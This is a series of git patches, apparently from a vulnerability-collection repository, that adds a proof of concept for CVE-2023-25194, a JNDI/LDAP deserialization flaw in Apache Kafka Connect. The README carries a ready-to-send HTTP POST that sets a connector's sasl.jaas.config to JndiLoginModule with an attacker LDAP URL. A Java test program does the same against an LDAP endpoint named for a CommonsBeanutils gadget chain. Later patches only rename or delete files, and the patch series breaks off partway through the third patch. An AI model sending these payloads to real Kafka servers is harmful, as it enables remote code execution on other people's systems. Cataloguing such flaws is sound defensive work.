From 2cc275cb521b834e2d96b3ce4a8a421d3f4a7d33 Mon Sep 17 00:00:00 2001
From: Bihe Zhao <13012563808@163.com>
Date: Fri, 17 Mar 2023 13:36:33 +0800
Subject: [PATCH 1/7] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-25194?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../2023/CVE-2023-25194/README.md             |  54 ++++++++++++++++++
 .../2023/CVE-2023-25194/java/.DS_Store        | Bin 0 -> 6148 bytes
 .../2023/CVE-2023-25194/java/.idea/.gitignore |   8 +++
 .../CVE-2023-25194/java/.idea/compiler.xml    |  13 +++++
 .../java/.idea/jarRepositories.xml            |  20 +++++++
 .../2023/CVE-2023-25194/java/.idea/misc.xml   |  14 +++++
 .../2023/CVE-2023-25194/java/pom.xml          |  28 +++++++++
 .../2023/CVE-2023-25194/java/src/.DS_Store    | Bin 0 -> 6148 bytes
 .../CVE-2023-25194/java/src/main/.DS_Store    | Bin 0 -> 6148 bytes
 .../java/src/main/java/Test.java              |  25 ++++++++
 .../java/target/classes/Test.class            | Bin 0 -> 1478 bytes
 .../java/target/classes/Test2.class           | Bin 0 -> 502 bytes
 .../2023/yaml/CVE-2023-25194.yaml             |  23 ++++++++
 openkylin_list.yaml                           |   2 +
 14 files changed, 187 insertions(+)
 create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/README.md
 create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/.DS_Store
 create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/.gitignore
 create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/compiler.xml
 create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/jarRepositories.xml
 create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/misc.xml
 create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/pom.xml
 create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/src/.DS_Store
 create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/.DS_Store
 create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/java/Test.java
 create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/target/classes/Test.class
 create mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/java/target/classes/Test2.class
 create mode 100644 cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml

diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/README.md b/cve/apache-Kafka/2023/CVE-2023-25194/README.md
new file mode 100644
index 00000000..6233bc1f
--- /dev/null
+++ b/cve/apache-Kafka/2023/CVE-2023-25194/README.md
@@ -0,0 +1,54 @@
+## Description
+
+A possible security vulnerability has been identified in Apache Kafka Connect. This requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka 2.3.0. When configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server. Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath. Since Apache Kafka 3.0.0, users are allowed to specify these properties in connector configurations for Kafka Connect clusters running with out-of-the-box configurations. Before Apache Kafka 3.0.0, users may not specify these properties unless the Kafka Connect cluster has been reconfigured with a connector client override policy that permits them. Since Apache Kafka 3.4.0, we have added a system property ("-Dorg.apache.kafka.disallowed.login.modules") to disable the problematic login modules usage in SASL JAAS configuration. Also by default "com.sun.security.auth.module.JndiLoginModule" is disabled in Apache Kafka 3.4.0. We advise the Kafka Connect users to validate connector configurations and only allow trusted JNDI configurations. Also examine connector dependencies for vulnerable versions and either upgrade their connectors, upgrading that specific dependency, or removing the connectors as options for remediation. Finally, in addition to leveraging the "org.apache.kafka.disallowed.login.modules" system property, Kafka Connect users can also implement their own connector client config override policy, which can be used to control which Kafka client properties can be overridden directly in a connector config and which cannot.
+
+
+## Poc
+
+```
+POST /connectors HTTP/1.1
+Host: xxxx:8083
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Content-Type: application/json
+Connection: close
+Content-Length: 1109
+
+{"name": "test", 
+   "config":
+    {
+        "connector.class":"io.debezium.connector.mysql.MySqlConnector",
+    	"database.hostname": "xxxxx",
+    	"database.port": "3306",
+    	"database.user": "root",
+    	"database.password": "xxxxxx",
+    	"database.dbname": "xxxx",
+    	"database.sslmode": "SSL_MODE",
+        "database.server.id": "1234",
+    	"database.server.name": "localhost",
+        "table.include.list": "MYSQL_TABLES",
+    	"tasks.max":"1",
+        "topic.prefix": "aaa22",
+        "debezium.source.database.history": "io.debezium.relational.history.MemoryDatabaseHistory",
+        "schema.history.internal.kafka.topic": "aaa22",
+        "schema.history.internal.kafka.bootstrap.servers": "kafka:9202",
+    	"database.history.producer.security.protocol": "SASL_SSL",
+    	"database.history.producer.sasl.mechanism": "PLAIN",
+    	"database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://aaa\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
+    }
+}
+```
+
+## Attention
+
+1. Import the libs by copy them to the kafka's libs directory.
+2. Kafka Connect must be running. (./bin/connect-distributed.sh config/connect-distributed.properties)
+3. mysql info must be right, and make sure kafka connect can connect the db.
+
+## References
+- https://github.com/ohnonoyesyes/CVE-2023-25194
+- https://github.com/luelueking/Java-CVE-Lists/tree/main/CVE-2023-25194
\ No newline at end of file
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/.DS_Store b/cve/apache-Kafka/2023/CVE-2023-25194/java/.DS_Store
new file mode 100644
index 0000000000000000000000000000000000000000..437bf16d324cca9b1efd2231476295416454f8de
GIT binary patch
literal 6148
zcmeHK&u`N(6n<{IHr0gG14z3dS=zN4WkviDmr%xm>oUOsP)U|*L}YQ*q!g*Dlr#J>
zT=`4*ci8uA54Gz!4gq>kdj9O^?>Wh5%Z`aijppfnq8<?iaK=U##WlwL>|56Gkv34-
zG2)lGIZbktY;h&<cPhYhw?hY%QA!h9pFds_&)^3?t=ZS_(3A|FgZ~+2zBb#;{&t1k
zq>^TIy2(;^uV*ETa_U#k_hg!9Wi=T5P>p75r`-uU!EW#_`d}7O6<70e6wlsp>%^Em
zxva;@t8B6u_ijHoMHOeoWM&hxbOOrT*IAL8#mLNyw6wXA>j=6*cih`sE{BgE_x12_
zxa#ZWlfyw@KNvn-t-8UT{d-T3#~<_a!hEqBkiuHGcFW@>d_~27^QUN5<fb@7gxPJX
zD25hi(73vy2WPEojHZ|<APR^AH>`l)$AaA(evS+;3Wx&#o&vl-XgFi&v36*;4ixqZ
z0Bj*_4R!t%<Q(lW^jJGY4@|jKpi5Q$ilJOO;@a~<kF`UWPRd_Clz+1FHxy-`j`6jn
zlL{S5DGG=Jn+h~tv&ZNEi{Ib>H<P3#3Wx&#l>(}D6djH5N&alz`ZzvoHT*rCjd``h
lUn!{AqZnL1iud5w5Z7D*h8}B&h`{7Wz{((nDDX!WxB#1gc#i-8

literal 0
HcmV?d00001

diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/.gitignore b/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/.gitignore
new file mode 100644
index 00000000..13566b81
--- /dev/null
+++ b/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/.gitignore
@@ -0,0 +1,8 @@
+# Default ignored files
+/shelf/
+/workspace.xml
+# Editor-based HTTP Client requests
+/httpRequests/
+# Datasource local storage ignored files
+/dataSources/
+/dataSources.local.xml
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/compiler.xml b/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/compiler.xml
new file mode 100644
index 00000000..10e71cf9
--- /dev/null
+++ b/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/compiler.xml
@@ -0,0 +1,13 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="CompilerConfiguration">
+    <annotationProcessing>
+      <profile name="Maven default annotation processors profile" enabled="true">
+        <sourceOutputDir name="target/generated-sources/annotations" />
+        <sourceTestOutputDir name="target/generated-test-sources/test-annotations" />
+        <outputRelativeToContentRoot value="true" />
+        <module name="CVE-2023-25194" />
+      </profile>
+    </annotationProcessing>
+  </component>
+</project>
\ No newline at end of file
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/jarRepositories.xml b/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/jarRepositories.xml
new file mode 100644
index 00000000..5a2f139c
--- /dev/null
+++ b/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/jarRepositories.xml
@@ -0,0 +1,20 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="RemoteRepositoriesConfiguration">
+    <remote-repository>
+      <option name="id" value="central" />
+      <option name="name" value="Central Repository" />
+      <option name="url" value="http://maven.aliyun.com/nexus/content/groups/public/" />
+    </remote-repository>
+    <remote-repository>
+      <option name="id" value="central" />
+      <option name="name" value="Maven Central repository" />
+      <option name="url" value="https://repo1.maven.org/maven2" />
+    </remote-repository>
+    <remote-repository>
+      <option name="id" value="jboss.community" />
+      <option name="name" value="JBoss Community repository" />
+      <option name="url" value="https://repository.jboss.org/nexus/content/repositories/public/" />
+    </remote-repository>
+  </component>
+</project>
\ No newline at end of file
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/misc.xml b/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/misc.xml
new file mode 100644
index 00000000..fe1451cb
--- /dev/null
+++ b/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/misc.xml
@@ -0,0 +1,14 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="ExternalStorageConfigurationManager" enabled="true" />
+  <component name="MavenProjectsManager">
+    <option name="originalFiles">
+      <list>
+        <option value="$PROJECT_DIR$/pom.xml" />
+      </list>
+    </option>
+  </component>
+  <component name="ProjectRootManager" version="2" languageLevel="JDK_1_8" default="true" project-jdk-name="1.8 (2)" project-jdk-type="JavaSDK">
+    <output url="file://$PROJECT_DIR$/out" />
+  </component>
+</project>
\ No newline at end of file
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/pom.xml b/cve/apache-Kafka/2023/CVE-2023-25194/java/pom.xml
new file mode 100644
index 00000000..17a4f7f1
--- /dev/null
+++ b/cve/apache-Kafka/2023/CVE-2023-25194/java/pom.xml
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>org.example</groupId>
+    <artifactId>CVE-2023-25194</artifactId>
+    <version>1.0-SNAPSHOT</version>
+
+    <properties>
+        <maven.compiler.source>8</maven.compiler.source>
+        <maven.compiler.target>8</maven.compiler.target>
+    </properties>
+
+    <dependencies>
+        <dependency>
+            <groupId>org.apache.kafka</groupId>
+            <artifactId>kafka-clients</artifactId>
+            <version>3.3.0</version>
+        </dependency>
+        <dependency>
+            <groupId>commons-beanutils</groupId>
+            <artifactId>commons-beanutils</artifactId>
+            <version>1.9.4</version>
+        </dependency>
+    </dependencies>
+</project>
\ No newline at end of file
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/src/.DS_Store b/cve/apache-Kafka/2023/CVE-2023-25194/java/src/.DS_Store
new file mode 100644
index 0000000000000000000000000000000000000000..a3a6aff4d353ba5afdaa1127b2d6ab7434c0d075
GIT binary patch
literal 6148
zcmeHKy-ve05I&bcQ&mVEK<XHYwSv+je#8<=8CVH|0Z>V31rceCnv@PzrOfa!tUL*?
z19!HmXn_$#(VcYu?DL%+e~xS)0EkAvy$(<U02`GsSHR*6p?=a&k~0<yQP3ENk-Q2b
z8DN_RWcm9H(B4_l1s_6)r}l3T`&M6-sD+IEf<ba;_W3!ui^3$WR$oMJ&YEAy+j+Za
zUwAii;H7@rPa1yjj9SN1M!|dC4^G0)pjBGhmvQQcai^yO!gdE;&QHU*Ee8$RkK2ig
z^>l|_unVnHc{r?ZZC9Lntv;$a!<|~S;%wA6N27whyt1}?)Vhtjv3$_f3;ZvYEE;@=
zN34w3bMN)yNXFM_BYz80=s*JL6dzC6_mK~5vM>Y805dR?44AXgF3#lF^G7oS%)n1F
zK<9&lO6VHQG^(Qm3zY&O(lb&C*45J=(IEq(YcSJ@78IdF5p}3ADTXkagV5pF?;8J1
zqYek5X2x;M%)(?S!XzHTQSKmIja)JV%)lfAbGlig`~Tqk{C_ftTg(76@UIvUR?}-X
za7pHF{j@l`YaP@}R1)&bG>${CqOM}}rK`A%ss!y0RS;c+nMSmr@Iye+zy&k#s|>sW
Dwb)>d

literal 0
HcmV?d00001

diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/.DS_Store b/cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/.DS_Store
new file mode 100644
index 0000000000000000000000000000000000000000..161d9f6e0c1fea4f00334944e674eb7c9f9fc825
GIT binary patch
literal 6148
zcmeHKO;6iE5S>j@u!Sn+P$Z6)dW}kotA3~#Hw}kgF)9bBf{i0^>w2R&A%`fE&+U)l
z+F#PY18;Vh2m-yLf@Y-IH#<9Hd*52SJ4B><)9f`-n}|FpW5Y*tkMKC_9cegE3#j-R
zUkZJa7CJ?rA1LzwGr()tqVJT@IVCIW_X%UKE{&LpEaTEyHFE3xCmj`eHR*Q$sz$T*
zY;E0J_cpw5@tK~*lVmcjddc{Zd;3}!>9w7tU-RK?(0=h*my;wfhhvkFXG4S>9pq)E
zXFWYFv&!VgcEIyJf6(5V&%<}`J3+V;E;_;d!%nvoyb0ef7QVOna{J@n;79SZ)W0nC
z3jd{%=MJyoH;m<c&f{@e=<*akj`wLyL#jyA6xIpbE6iLV>LxSjiU<S3fH3fg7;t-|
zxABO+Sw2-55C$HG0p1@1C}ZTXwrI8vG^PXq@-@;3Y;*Mo2J8Sv4r`0>K$J}d+EnFA
z4CN{ZWz#Vpx%k?mO($jEjOVyFD_5Z?S9qwvgp-OaN-GQq1GgDy+HRZA|J{Gr|F@H*
zCkzM!Pl^H6>c{;arsU4nJCozHHh>;OSvan?xJ-dzj$*{}QM?5;0)M~;FmhO1ga;xQ
N0Yif{!oY(va0S~CVx#~7

literal 0
HcmV?d00001

diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/java/Test.java b/cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/java/Test.java
new file mode 100644
index 00000000..72119106
--- /dev/null
+++ b/cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/java/Test.java
@@ -0,0 +1,25 @@
+import org.apache.kafka.clients.producer.KafkaProducer;
+import org.apache.kafka.clients.producer.Producer;
+import org.apache.kafka.clients.producer.ProducerRecord;
+
+import java.util.Properties;
+
+public class Test {
+    public static void main(String[] args) {
+        Properties props = new Properties();
+        props.put("sasl.mechanism","SCRAM-SHA-256");
+        props.put("security.protocol","SASL_SSL");
+//        props.put("security.protocol","SASL_PLAINTEXT");
+        props.put("sasl.jaas.config","com.sun.security.auth.module.JndiLoginModule " +
+                "required user.provider.url=\"ldap://127.0.0.1:1389/deserialCommonsBeanutils1\" " +
+                "useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" " +
+                "group.provider.url=\"xxx\";");
+        props.put("bootstrap.servers", "localhost:9092");
+        props.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
+        props.put("value.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
+        props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
+        props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
+
+        Producer<String, String> producer = new KafkaProducer<>(props);
+    }
+}
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/target/classes/Test.class b/cve/apache-Kafka/2023/CVE-2023-25194/java/target/classes/Test.class
new file mode 100644
index 0000000000000000000000000000000000000000..c16dc92d9d3f8a7386d26d7e7ac4fbec5ab88194
GIT binary patch
literal 1478
zcmb7ETTdHD6#fPSUK}8>P}-z7$88d>yD<S`b887zTD41p*eDh4Lp5Gc?18<wGrJb#
zU-hL(jnwz{u|KHlnO)qbP^pSno;~L~_oHw2_dkF66~G!ES1^agGL|YB!lH#`3oAx+
zEVvdPSg2cAweZlwnuT=>8x|f}Xjo`k*eqkKf*EX=u~Wt_!|1k*WlBP6e&Gef@P5)3
z3^zR)i>F!C66!f`g@o8%67cW^SJLR0;BeZNnsRv0g-*99I^r^Bn4ACJJK=rqhCJ@L
zeyU{L*~+tX)gk|x|1dL*^i<L#>s%3=r80C62@)!mLQ{5&9NJkR6vMKYsE*5fJm?Dd
zl)pUXZV*Zlr`jDjnb_Q$BIo|y{CRIMz|mXe*}gv0b!3;SRs1AVfp{X#-p0&o9J7sa
zyo>i3X7kNlnT}yna~(R72)aC$I%1gc_mB1tR{XE_R#w+H#_<_GXPDL^$dpXa9U3!D
zf+VE1_<O$hgYSC`Q+bjT&b1RH@k`lZ_$^2xM`y9~cO=i!t`pI2Lg9QJx22bKWPFh8
zRV9ARq!R6FriC&!`m#+zrox?C*yg=W*R9tZPW=)6S2vus=4Sn2qv^H<xl11ICsCBd
z`mx}#8Bo`2CeahAbb83O-l?T36SXQi_hlfS@<{B|&T7@RXl0#&v7?f#cct{%*;$Pi
zJKai>RHusfXd2ZQir6w48eVo2oo+TCG*@W{r{dfhG$dacwls(=PC*tYCkt)IG-|R?
z*YXulC20jwzqp*G2(|k>%*2&^lcvNV))d%yn*#o2Q4=^-q<=G)`~S@T#t?o$Z$qm+
zx_X9Zl<=Q>_pEgy0)k4tjLydV8)Pj^Ti20=>kz}O%g`&Fr5lYqc!$14<~Iap_)X_6
z(p-8odXFq#fc=!4Z__!NgJrx=@_6BZ5AY#rWB3Rk6Jmn@K#3mUyVn>xzCg)avWM-F
zpE3IFl3li~LKw3vg>b_jFN6tuvJh?#geiNvK<q+zjhW-63(Ovvj!G~cIk-XR7%WsU
zP4aC_;1iOTVPl=Xle?J3mo(%d4R=iAna-<4cl5qPnuR0OD29=p;ZxkDRoo-o%vT`y
M^X1GFHiU)00A>n~g8%>k

literal 0
HcmV?d00001

diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/target/classes/Test2.class b/cve/apache-Kafka/2023/CVE-2023-25194/java/target/classes/Test2.class
new file mode 100644
index 0000000000000000000000000000000000000000..7dd11a74d3a939a1046cde14175f12cd700b109d
GIT binary patch
literal 502
zcmb7BO-lnY5PjLUyX{(Sty=Zyt%@`t-YS9!9wh3ar68WtZP=!Cv#=k6Kg&}=!5`p{
z5+|up1TW?=A8+2gNhY6PZyx~8aTub8y#U=1p7r|y4jB9kZFF(TQ0X0y8LHRmR57%K
zHtN1iCMp}r$%2rMNF%uz%S_w+2dow|oihYtr1IiyK<$athN0Vg5_9=1`9hkQ4~tBj
zc;Mt^7E{B{A7vUkH&ZRrSev_aTH2v~5v2*wOT%*&m6<MHxGakqPh6ef{^ryCaF~`^
zq;9nB4&AN#_99LA2pCTPBgas40u1f-TOKBJ6%{x_m6mCb2ihS5vUSQhc}Bi=vIKi|
z<px>bffa-lH&+B~Py{rvi7i5G^A(AC7JG;HxI{&)1?-oRD$#r=(p?eJLYwe932dW7
KmR3u-huv>JUuy0E

literal 0
HcmV?d00001

diff --git a/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml b/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml
new file mode 100644
index 00000000..43b5846e
--- /dev/null
+++ b/cve/apache-Kafka/2023/yaml/CVE-2023-25194.yaml
@@ -0,0 +1,23 @@
+id: CVE-2023-25194
+source:
+  https://github.com/ohnonoyesyes/CVE-2023-25194
+info:
+  name: Apache Kafka is a distributed event store and stream-processing platform. It is an open-source system developed by the Apache Software Foundation written in Java and Scala.
+  severity: high
+  description: A possible security vulnerability has been identified in Apache Kafka Connect. 
+  This requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka 2.3.0. 
+  When configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server. 
+  Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath. 
+  scope-of-influence:
+  Apache Kafka 2.3.0
+  reference:
+  - https://github.com/ohnonoyesyes/CVE-2023-25194
+  - https://github.com/luelueking/Java-CVE-Lists/tree/main/CVE-2023-25194
+  classification:
+  cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+  cvss-score: 8.8
+  cve-id: CVE-2023-25194
+  cwe-id: CWE-502
+  cnvd-id: None
+  kve-id: None
+  tags: Deserialization of Untrusted Data
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 7c4549f5..d7b9b900 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -12,6 +12,8 @@ cve:
     - CVE-2022-24706
   apache-Dubbo:
     - CVE-2021-43297
+  apache-Kafka:
+    - CVE-2023-25194
   apache-log4j:
     - CVE-2021-44228
   apache-solr:
-- 
Gitee


From 687b29ddf805aef5e3b3ecb1b365e9f8ed84e5e2 Mon Sep 17 00:00:00 2001
From: Bihe Zhao <13012563808@163.com>
Date: Fri, 17 Mar 2023 13:38:57 +0800
Subject: [PATCH 2/7] =?UTF-8?q?=E4=BF=AE=E6=94=B9CVE-2023-25194?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../{java => CVE-2023-25194-java}/.DS_Store         | Bin
 .../{java => CVE-2023-25194-java}/.idea/.gitignore  |   0
 .../.idea/compiler.xml                              |   0
 .../.idea/jarRepositories.xml                       |   0
 .../{java => CVE-2023-25194-java}/.idea/misc.xml    |   0
 .../{java => CVE-2023-25194-java}/pom.xml           |   0
 .../{java => CVE-2023-25194-java}/src/.DS_Store     | Bin
 .../src/main/.DS_Store                              | Bin
 .../src/main/java/Test.java                         |   0
 .../target/classes/Test.class                       | Bin
 .../target/classes/Test2.class                      | Bin
 11 files changed, 0 insertions(+), 0 deletions(-)
 rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/.DS_Store (100%)
 rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/.idea/.gitignore (100%)
 rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/.idea/compiler.xml (100%)
 rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/.idea/jarRepositories.xml (100%)
 rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/.idea/misc.xml (100%)
 rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/pom.xml (100%)
 rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/src/.DS_Store (100%)
 rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/src/main/.DS_Store (100%)
 rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/src/main/java/Test.java (100%)
 rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/target/classes/Test.class (100%)
 rename cve/apache-Kafka/2023/CVE-2023-25194/{java => CVE-2023-25194-java}/target/classes/Test2.class (100%)

diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/.DS_Store b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.DS_Store
similarity index 100%
rename from cve/apache-Kafka/2023/CVE-2023-25194/java/.DS_Store
rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.DS_Store
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/.gitignore b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/.gitignore
similarity index 100%
rename from cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/.gitignore
rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/.gitignore
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/compiler.xml b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/compiler.xml
similarity index 100%
rename from cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/compiler.xml
rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/compiler.xml
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/jarRepositories.xml b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/jarRepositories.xml
similarity index 100%
rename from cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/jarRepositories.xml
rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/jarRepositories.xml
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/misc.xml b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/misc.xml
similarity index 100%
rename from cve/apache-Kafka/2023/CVE-2023-25194/java/.idea/misc.xml
rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/misc.xml
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/pom.xml b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/pom.xml
similarity index 100%
rename from cve/apache-Kafka/2023/CVE-2023-25194/java/pom.xml
rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/pom.xml
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/src/.DS_Store b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/.DS_Store
similarity index 100%
rename from cve/apache-Kafka/2023/CVE-2023-25194/java/src/.DS_Store
rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/.DS_Store
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/.DS_Store b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/main/.DS_Store
similarity index 100%
rename from cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/.DS_Store
rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/main/.DS_Store
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/java/Test.java b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/main/java/Test.java
similarity index 100%
rename from cve/apache-Kafka/2023/CVE-2023-25194/java/src/main/java/Test.java
rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/src/main/java/Test.java
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/target/classes/Test.class b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/target/classes/Test.class
similarity index 100%
rename from cve/apache-Kafka/2023/CVE-2023-25194/java/target/classes/Test.class
rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/target/classes/Test.class
diff --git a/cve/apache-Kafka/2023/CVE-2023-25194/java/target/classes/Test2.class b/cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/target/classes/Test2.class
similarity index 100%
rename from cve/apache-Kafka/2023/CVE-2023-25194/java/target/classes/Test2.class
rename to cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/target/classes/Test2.class
-- 
Gitee


From 4939e3ddb416024bb55793800011dae5d1f00bad Mon Sep 17 00:00:00 2001
From: Bihe Zhao <13012563808@163.com>
Date: Fri, 17 Mar 2023 13:42:43 +0800
Subject: [PATCH 3/7] =?UTF-8?q?=E4=BF=AE=E6=94=B9CVE-2023-25194?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../CVE-2023-25194-java/.idea/.gitignore      |  8 --------
 .../CVE-2023-25194-java/.idea/compiler.xml    | 13 ------------
 .../.idea/jarRepositories.xml                 | 20 -------------------
 .../CVE-2023-25194-java/.idea/misc.xml        | 14 -------------
 4 files changed, 55 deletions(-)
 delete mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/.gitignore
 delete mode 100644 cve/apache-Kafka/2023/CVE-2023-25194/CVE-2023-25194-java/.idea/compiler.xml
